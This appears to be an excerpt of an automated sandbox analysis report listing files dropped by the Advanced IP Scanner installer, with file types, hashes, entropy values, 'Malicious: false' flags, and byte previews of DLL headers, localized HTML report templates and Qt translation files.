Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Statuss:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Oper.t.jsist.ma:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Ra.ot.js:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Lietot.js:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tips:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datums:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Koment.ri:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Pakalpojums</center></b></td><td><b><center>De

C:\Program Files (x86)\Advanced IP Scanner\is-O0KOL.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5987880
Entropy (8bit):	6.645849589307296
Encrypted:	false
SSDEEP:	98304:I9HgaLmICbZhV8cBfAVG4F40zkpEJsv6tWKFdu9CcDo+fN4A:I9Hgaq5b7OcBfAVG4FiEJsv6tWKFdu9V
MD5:	C2BB94B2C229ECE69D865B1898C71324
SHA1:	AFAC1A2FEDE68AD129BB48B01ED8B80997F75D2F
SHA-256:	193814D47E0B7917C3373011F64CD3AC649A16D1D0515C9D409FA1794C5BFFB1
SHA-512:	2CB31EB8FD866510268553B77D2BB4DDFFB4D48F22C35B8679933CB48AC7B90DE1AEFCF6132DBCEF007F6F622869C931BE13A5D41234E49E0C7DB3F8C5CF8B0A
Malicious:	false
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.............s...s...s......s.\S....s..w...s..p...s..v...s..r...s..w...s..u...s..r...s...r...s...w...s...v...s...s...s.......s.......s...q...s.Rich..s.................PE..L.....%^...........!......7...$.....\|m5.......7....g..........................[.......[...@..........................eS.....\|zY.\|....0Z..............B[.(....@Z.8.....P.T.....................P.......P.@.............7..............................text.....7.......7................. ..`.rdata..4.!...7...!...7.............@..@.data...L.....Y..2....Y.............@....rsrc........0Z.......Y.............@..@.reloc..8....@Z.......Y.............@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-O14EM.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1163
Entropy (8bit):	4.820312505780483
Encrypted:	false
SSDEEP:	24:lFoJgsuSAXqSH+l70Kt5RGDSRBIReEhyv:HogsRAXqSH+l70U2Di0s
MD5:	D085FB64BFB3757DB202DE6552075927
SHA1:	6D7D1701D2C4A9E4AF18217DD9169E19E1D03F3A
SHA-256:	411862A29DF284FA2D4B2E33FB9839DD030A99EBC5823212E9CDB2FFCFB3EE26
SHA-512:	5BEA33C25F3A28D1138834F6E6D8C2D9BAEAFEE39833980C1EC022ED8EEAE75453747CF844C31232F9F46D77C427F388CF65B070F03ED5C81B166D85BBD41379
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stanje:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operacijski sistem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Proizvajalec:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Uporabnik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Vrsta:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarji:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Storitev</center></b></td><td><b><center>Podro

C:\Program Files (x86)\Advanced IP Scanner\is-O6RBU.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1155
Entropy (8bit):	4.8635515480686085
Encrypted:	false
SSDEEP:	24:lFozSsuSxXqXH0k9/Ue/0Kt5RGD4ReEhyv:HESsRxXqXHBUM0U2DSs
MD5:	E63975AFFC0CFD1416D93982E6E0C0E8
SHA1:	28F0F8996D128E8095BE958B32F245F1EBB90D60
SHA-256:	6B385410B01F24D20294E1B92E7D391F20D146A0AAB937809483C8ED624017CA
SHA-512:	2DE0EA4CF7C1B0FBB3375A2E46677E48C7CE967954ED19B9B43DCACA462960A55969E6EB7FA51E12656F812C6768CA1E135007111BD4AAA31055847F229656D5
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Durum:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>..letim sistemi:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.retici:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Kullan.c.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>T.r:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Tarih:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Yorumlar:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Hizmet</center></b></td><td><b><center>Ayr.nt.lar</

C:\Program Files (x86)\Advanced IP Scanner\is-OBI2J.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	7.011995208399749
Encrypted:	false
SSDEEP:	192:XY9fHQduPWVghW/EgbXH9YOCAs/nGfe4pBjSfbxaWNArXVWQ4mW0qnajMHxxBNTM:ef5W2hWcgbCA0GftpBjuYDlI663UD
MD5:	D6ABF5C056D80592F8E2439E195D61AC
SHA1:	33F793FD6A28673E766AD11EE1CF8EB8EF351BC0
SHA-256:	8858D883D180CEA63E3BF4A3F5BC9E0F9FA16C9A35A84C4EFE65308CEA13A364
SHA-512:	6678F17F2274AABBA5279BA40A0159FF8A54241D811845A48D845172F4AA6F7397CFD07BF2368299A613DF1F3FF12E06C0E62C26683DFB08D82122609C3A3F62
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......T....@.............................^............ ...................<..............8............................................................................text...n........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-OIGQ5.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1159
Entropy (8bit):	4.88658440484172
Encrypted:	false
SSDEEP:	24:lFosMmsuSNXq2HJi4c3Q0Kt5RGDxReEhyv:Hx1sRNXq2HJS3Q0U2D7s
MD5:	E133CA274E9A1C5B55A9AE459656E935
SHA1:	B115F78BD0BA440A10A2ED5093712D7675F3E45C
SHA-256:	D80655A9F288A1207F193025486A876F3B0BF30584F361FF04E8ECEBCB444DA0
SHA-512:	CD4B9AEECE96654B462CF2887C3A6809FA083772016D078172D19C64332D072FE3A1E1F46EF7B1017F3FDAF9F7B0BDC131682BCA50645909FA5BDB807D66B2FB
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stav:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Opera.n. syst.m:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>V.robca:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Pou..vate.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>D.tum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Koment.re:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Slu.ba</center></b></td><td><b><center>Podrobnos

C:\Program Files (x86)\Advanced IP Scanner\is-OJCV9.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	6.98650705248822
Encrypted:	false
SSDEEP:	192:7WVghWu7vSx9YOCAs/nGfe4pBjSby+ggmGWNArXVWQ42WHmMqnaj9RlS6VSyS:7W2hWmSUA0GftpBj+1bMlBRAkS3
MD5:	F6D1216E974FB76585FD350EBDC30648
SHA1:	F8F73AA038E49D9FCF3BD05A30DC2E8CBBE54A7C
SHA-256:	348B70E57AE0329AC40AC3D866B8E896B0B8FEF7E8809A09566F33AF55D33271
SHA-512:	756EE21BA895179A5B6836B75AEEFB75389B0FE4AE2AAFF9ED84F33075094663117133C810AB2E697EC04EAFFD54FF03EFA3B9344E467A847ACEA9F732935843
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......W5....@.............................L............ ...................<..............8............................................................................text...\........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-OMMKA.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1155
Entropy (8bit):	4.85707182260681
Encrypted:	false
SSDEEP:	12:AMJnuKome2B2B2uT2B8G2MKb2tcz2HcqQ2Rn2o2n0Kt1RhRGDb7zYLtzAkReEiWC:lFoUssuSqZXq5HJ8n0Kt5RGDUReEhyv
MD5:	1AD783BD4AF434D47BD69AB818A91DFA
SHA1:	8CC2CED11B633A2F11A1E48E7F209A6E9E0A3187
SHA-256:	2A51B6D68D941C570E1F4DE827D60CE7B0063D255A52099B46406D14249EF919
SHA-512:	1AD4BE09630713AB267391C57C0C71AA139B69799F612DC17D8EBD57D91E98E6B037D8102892BB6A53D4CA3AD9EC9C6BDF3F002AEBC69468AFAAEB84211C9E02
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stan:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>System operacyjny:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Producent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>U.ytkownik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarze:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Us.uga</center></b></td><td><b><center>Szczeg..y</

C:\Program Files (x86)\Advanced IP Scanner\is-OT0US.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19648
Entropy (8bit):	6.961849079425489
Encrypted:	false
SSDEEP:	192:pYTRQqjd7NWVghW/RmgbXH9YOCAs/nGfe4pBjSf1wjWNArXVWQ4mW4C0zA7qnajP:2KcW2hW5mgbCA0GftpBjLKlvQyURz8x
MD5:	8F8A47617DFD829A63E3EC4AFF2718D9
SHA1:	1D7DC26BB9C78C4499514FB3529B3478AECF7340
SHA-256:	6D4A1AAD695A3451C2D3F564C7CC8D37192CD35539874DF6AE55E24847E51784
SHA-512:	D3B96B1F80C20DE58A4D4179177E1C1C2B460719968FBA42E1BA694D890342AAAB5A8C67E7FFDD126B2FC6D6A7B2408952279D8926B14BF2DF11740483867821
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......\r....@.............................x............ ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-P26AP.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18112
Entropy (8bit):	7.072469017642331
Encrypted:	false
SSDEEP:	384:mG1W2hWhSUA0GftpBjy6oNxll7PedGitM/:mGTgio6CJkGcG
MD5:	FDF0B4BF0214585E18EE2F6978F985B0
SHA1:	0FE247F8CCA0C04729135EE612FBFCED92D59D9D
SHA-256:	CF42C1215695579ADE1842246EC43DA9A9B28E8107957C0C340CE3BA9F689584
SHA-512:	D0A249C230520538E8C2759CC0A41444C543DABD6347C8A8231C587EBBA28905AD2DF5E5D6437881C7A02F6DE6212A719ACCA2F6D30F63F8D7A21A26921A1807
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-P7PAJ.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1148
Entropy (8bit):	4.7922327669232505
Encrypted:	false
SSDEEP:	24:lFoufsuSqJXqL0He3yk/0Kt5RGDNsm6ReEhyv:HnfsRqJXqL0He3ym0U2D+mAs
MD5:	88B009CCACF0EB1B4A141470D3F160C4
SHA1:	EE0D1A44562CCDEDBCDE92D232FA541F53826B4B
SHA-256:	D2254ED99166A12CE00F93379142ACFCBF9A49AF3FB8789E8215B0C1CCCB4587
SHA-512:	D07C7B90A12E7E48A90BF450A57E4479AE5BB130EFE9950A316D9A7AB9063D94AF0F35942925ACA41A7C2C149A0F31A075C38DD0B34821F88BD81588660D0BE1
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistem operasi:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produsen:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Pengguna:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipe:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Tanggal:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentar:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Layanan</center></b></td><td><b><center>Rincian</center>

C:\Program Files (x86)\Advanced IP Scanner\is-PCH10.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	data
Category:	dropped
Size (bytes):	590271
Entropy (8bit):	7.998650752150742
Encrypted:	true
SSDEEP:	12288:FJRxPJ22FvSUzQI2XsdVYfVnFW4XG1s5x41ZRR8kd+O0p1mXuFm1ssGHw5AX+4nL:FSyaukwGf79ueU/RVd+l/1F/HL3nL
MD5:	637FB65A1755C4B6DC1E0428E69B634E
SHA1:	FBA4652B6DBE0948D4DADCEBF51737A738CA9E67
SHA-256:	B3B1FF7E3D1D4F438E40208464CEBFB641B434F5BF5CF18B7CEC2D189F52C1B6
SHA-512:	F8FE4083361386C806D95DF7BE83C83BAD07E2F2563290C343F0DF2FE6BCA8EAD1BE7E0B38B91C1689CE26E8E77FC753845A574DC5ECFD3ABF71AEAC966E21AD
Malicious:	false
Preview:	.&3[x..}y_.F........../N..1..a..`33.".,. K.$..0...n.%.......&.l..........h`.Y.7..0..+v.....0.b..il..N..G.m..?6.....^..}{....{.F..7.m.f.....5..`.[.w.....pl.:.0.#x._.1.r.....X...X.2}.......aT+.}x...%[e#..@%.........X"..\R.........sbK_ef..............:..Hg...q..F.......%...g..G...~..#....!.z..R.8.h...q._'...N8.]?..........4s}........5G.6...kj>.=...b..GS.K.o".......h....x...&..;..'s....;;.Z.T).....'......88h...c,k.>.g0..=L[.\|{..\.u.Qh!.-.G,F...w....`..:../...>.x....5.1b..([.......P..f..1r...]0.).`.W..[....HL..`h.n..BJ.0A3....OM......z0,.?L...x.....^..a....(..@R..)...c..;....$....(M......GW..@..T......3. .q\|;.a.y.c.w...@E#.O.U....m.7NxW..."As.v.II.@..."...1....3.B.s..`.E.3.8.@..siz)YbuQ...`...O.ES...^.bcvk.Pm ..4..s.....r:..G..`c.0..%zb.%.0..i.\|d...p.;ZO.k.-od#...$.`l^#.C.......M\$.\q.....}.LZO..&..+...L.}.]..u..'...v......;..;..."<=8.+.V....9E...X..m...`.13.j.......'....kS..F.....=@....."f.c.8......sP\...... hc..`~...........x.........G1.

C:\Program Files (x86)\Advanced IP Scanner\is-PCUIV.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	21282
Entropy (8bit):	5.593895866111406
Encrypted:	false
SSDEEP:	384:yuFG9W5Ig0o3We2RYzomp0T/MpVLcLvF13fLQ:vFG9W5Ig0o3Weauoz0pVQ4
MD5:	6885AC8F42A02A32B59AA84D330925C3
SHA1:	A070B4B8BF1128197681487D332168A537107FB9
SHA-256:	2D7D17A4ECD78F916216C9E0D11897742A9AAF1E0988F60579B034319F2397D8
SHA-512:	4765739E9E45059E5A57F970133D11E8C418DE43A36602A21561A4A1027EE450AF091DA1F7BBD4CE5FD00299422679B66AC88516ACF618EA15931C3261850E9E
Malicious:	false
Preview:	<.d....!..`...B..........AX...;.......;...5...;.......;...W...;..16...O..C....[..@J...^..#E...^..=...(5......G....Z..H,..:...K....8..N:...\|..V...2Y.._...D........\......:....y..;O.......c..............A4...t...u...t..;....t..Cc...../....j......5t......@...0...H5..A...f...#e......3........g.......1...~..%h...`..(....e..B.......C........0. =...3...y......y......%......0...C.+.......+.......+....4.+....@.+.......G.......G.......H0...C?.Hw9...y.Hw9...G.I.....".J6......J6......J6......J6...5..LD......L.b..C..M.S../x.R.......V....#..Wi...B..W.T.....Z.\|..<9.[f3..?&.gc......w0K..4...H...........D....T......."..&....~..(@.. d..3a...T.."G..2....)......B<......G..9.E.....L.#..I..M$o.....e.....B.l8...(....^..5...I...........0.......<.......A...>......>...,..3..#...l...6.......*L.5.l..FE.AV......y....@....0..=.......<.......A...tb..'J......................=.......,.......9..(....=D.1V......R....$..W.<..F..f.~..........&...1........^..'....5...!..........c..3..;6...G..q.J..:r..I....U..I

C:\Program Files (x86)\Advanced IP Scanner\is-PIDI5.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20672
Entropy (8bit):	6.988142648004873
Encrypted:	false
SSDEEP:	384:0Ok1JzNcKSIxW2hWFSUA0GftpBjluF3sBlvQyURz8o:0pcKSCUi++rvU2o
MD5:	39047E168FFBDD19185504633D6ECA29
SHA1:	FE3423689EFEDADA19C7DEC3D5DD077A057BF379
SHA-256:	611B3E36AD3E0045AB4170A5D4E2D05FD2A26DDE2F7B09EA51F4264E263A544B
SHA-512:	8B7D38726E302CDCF5A296E50CCC969B2B122432B93E2B5D1D1F4C1B6C2B3A9B64AF79BB65A7A9EAC31F563AE60934458F9316DD5CBB071FB0A3AD180FAC6103
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......~.....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-PLELM.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6708264
Entropy (8bit):	6.661851136227646
Encrypted:	false
SSDEEP:	98304:YMm4f0AN5rHUQ+P2DkVNYVBcE7hxc5Rar3v:Yb4fzN5rHUj+D5VBckhkRGv
MD5:	1FBE59E9BE0F445BB14BE02C0EE69D6F
SHA1:	98F62A873CA78E9BE7760DE0FDDEDC56FAE2505D
SHA-256:	F201494B5EBE609FF2CA7D36275B19AB645C81153417B5FF4852AD8E164E144D
SHA-512:	00A61EB5B7B412CFF8BB92157DD2330FC7729C23E82A6C9648C067581DDF91E0743EC5CF4B3D4D59EA49C7EDCDA63DBF39350A173A354EC465E3F5A5D087F24F
Malicious:	false
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........#..B}..B}..B}..:.B}.+..B}../y..B}../~..B}../x..B}../\|..B}.\|/\|..B}..*\|..B}..B\|.#G}.\|/y..B}.\|/x..C}.\|/}..B}.\|/...B}..B.B}.\|/...B}.Rich.B}.........................PE..L.....%^...........!......E...".......E......0E..............................`g.......f...@.........................P.J..`..,Gb.@.....d..............@f.(.....d.\....rJ.T....................sJ......sJ.@............0E.4............................text...O.E.......E................. ..`.rdata..,....0E.......E.............@..@.data....A...0c..\....c.............@....rsrc.........d......xc.............@..@.reloc..\.....d......~c.............@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-QAUD7.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	6.969708578931716
Encrypted:	false
SSDEEP:	192:sWVghW/cgbXH9YOCAs/nGfe4pBjSf4AKWNArXVWQ4mWvMHqnajMHxxBNT0662ONh:sW2hWUgbCA0GftpBjQGEMHlI663Uh
MD5:	45C54A21261180410091CEFB23F6A5AE
SHA1:	80EEE466D086D30C61EAEFC559D57E5E64F56F61
SHA-256:	2B0FEA07DB507B7266346EAB3CA7EDE3821876AADC519DAF059B130B85640918
SHA-512:	4962F85C94162FE2E35979FFF4E4B3752F322C61D801419769916F5E3A0E0C406284D95C22709C690212D4572EB688D9311A8F85F17C4F5D1A5A9F00E732808C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......S....@............................."............ ...................<..............8............................................................................text...2........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-QKPDD.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28561
Entropy (8bit):	5.2596092915719215
Encrypted:	false
SSDEEP:	768:O4suMMyQmmoRKIKfAoMzI4VxECTwTPJBLCsDbn:tsuMMypm/M04MCYTL/n
MD5:	1D2AAC0633801D7DEF387CF78A968BFF
SHA1:	D4721BBF3AA690683DCD75B690080A9785BF81B5
SHA-256:	8FDF83BEB8D7E9D3CD0B77DDC636A77A1E4FF591ED10851229ED49BDC78644DF
SHA-512:	956759A441647A00FCEA9AA4BE7DBA4463DDC6DA2EBBBFDF697BAED99CEF55B924D72F92E3443251C5C64927FF37DE345F95C366920ADFE829823105C3EB0673
Malicious:	false
Preview:	<.d....!..`...B..........[H...;...D...;.......;.......;..!....;..Ef...O..^,...[..Y....^..0....^..U...(5...m..G.......H,..R...K...A...N:......V...F..._..._`......).......R....y..S........7..............[ ...t..+O...t..S....t..]......B....j......5t...y..@...D}..H5..[...f...1!......Gn.......a...........~..4....`..9....e..]E......]k......... =...H...y...f..y...u..%..%F..0..%o.+.......+.......+......+......+....'..G.... ..G....+..H0...]..Hw9.....Hw9.....I....)@.J6......J6......J6......J6...K#.LD......L.b..^..M.S..C..R.......V....1O.Wi...\..W.T.....Z.\|..Tm.[f3..Xd.gc......w0K..I...H...&-......^....T......."..6....~..8... d..G....T../W..2...........\L......b..9.E..B..L.#..e_.M$o...\.e.......l8...83...^..K`..I....J......D.......U_......\...>......>...z..3..0...l...L.......;..5.l..a..AV...(..y....ZW...0..V8......U.......[...tb..7.......................V.......?4......Q..(....U..1V...*&.R....2..W.<..b..f.~..".......5...1....g...^..7....5...[..........c..H@.;6...c..q.J..Q...I.......I

C:\Program Files (x86)\Advanced IP Scanner\is-RBEFM.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1173
Entropy (8bit):	4.837006163390497
Encrypted:	false
SSDEEP:	24:lFoSb9bqsuShXqRHRM9BHBl0Kt5RGDhC+6ReEhyv:Hpb9bqsRhXqRHwBhl0U2Dw+As
MD5:	3DF24E832E07A361EE154A0635DF60F7
SHA1:	B02EDAA0C6B997830669B6FF1A3C6FB43331CFD3
SHA-256:	7A0B4383F55B6D2D52869CD50951FDE5ABE94208DE076161D12F7702537F37EA
SHA-512:	C8E81AFCF8E26086E83E410F158C46336CDB039014FDB1686F5E039032E044B87EBFEF1E9E71CBA34FA6D0F24EFE914A4AE180A61CB80E619C18BBE1D6ACAD2C
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Estado:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistema operativo:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabricante:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Usuario:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipo:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Fecha:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comentarios:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Servicio t.cnico</center></b></td><td><b><center>M

C:\Program Files (x86)\Advanced IP Scanner\is-RE519.tmp

Download File

